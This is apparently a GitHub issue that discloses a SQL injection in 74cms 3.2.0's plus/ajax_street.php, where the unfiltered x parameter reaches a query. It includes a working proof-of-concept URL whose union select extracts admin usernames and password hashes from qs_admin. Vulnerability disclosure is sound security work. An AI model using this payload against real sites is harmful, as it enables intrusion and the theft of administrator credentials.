Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

74cms 3.2.0 plus/ajax_street.php x SQLinject #10

Open
blindkey opened this issue Feb 18, 2020 · 0 comments
Open

74cms 3.2.0 plus/ajax_street.php x SQLinject #10

blindkey opened this issue Feb 18, 2020 · 0 comments

Comments

@blindkey
Copy link
Owner

upload/plus/ajax_street.php
image

$alphabet=trim($_GET['x']);
and then $alphabet has been pass to sql without filter so leads to sql inject

poc like :

/plus/ajax_street.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant